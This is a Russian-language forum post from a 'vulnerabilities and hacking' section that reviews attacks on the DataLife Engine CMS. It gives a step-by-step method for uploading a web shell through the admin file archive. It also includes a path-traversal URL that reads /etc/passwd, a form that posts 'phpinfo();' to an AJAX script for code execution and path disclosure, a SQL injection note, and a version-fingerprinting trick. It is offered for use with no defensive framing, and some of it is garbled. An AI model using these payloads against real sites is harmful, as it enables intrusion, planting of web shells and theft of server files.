Обзор уязвимостей DLE (DataLife Engine)

Тема в разделе "Уязвимости и взлом", создана пользователем Дима22, 29 июн 2017.

  1. Дима22

    Дима22

    Сообщения:
    672
    Баллы:
    18
    Как узнать установленную версию DLE?

    1. Открываем: site.com/engine/ajax/updates.php
    2. Смотрим установленную версию

    Как залить шелл в DLE v4.1-8.2?

    Итак, заходим в админцентр.
    Далее нажимаем "Другие разделы"
    Выбираем где-то в конце "Архив файлов"
    Идём на "Настройка Архива Файлов"
    Допустимые форматы файлов: дописываем php.
    Сохраняемся, идём в "Добавить файл".
    Заливаем шелл
    Его дальше видно в разделе "Файловый Архив" для всех и в свойствах загруженного файла в редактировании файлов в админке.
    Автор способа: desTiny

    DataLife Engine <= v4.1

    sql-inj
    Уязвимость существует из-за недостаточной обработки входных данных в параметре "user" в сценарии index.php.


    DataLife Engine <= v4.2


    http ://dle.com/engine/ajax/vote.php?vote_action=results&vote_skin=../../../.




    ./../../../../../../../etc/passwd�

    Раскрытие полного установочного пути:
    Код
    <form name="eval" action="http://site.com/upload/engine/ajax/keywords.php" method="post">
    <input type="text" name="text" value="phpinfo();"><br />
    <input type="submit" name="submit" value="zapros">
    </form>

Поделиться этой страницей

Top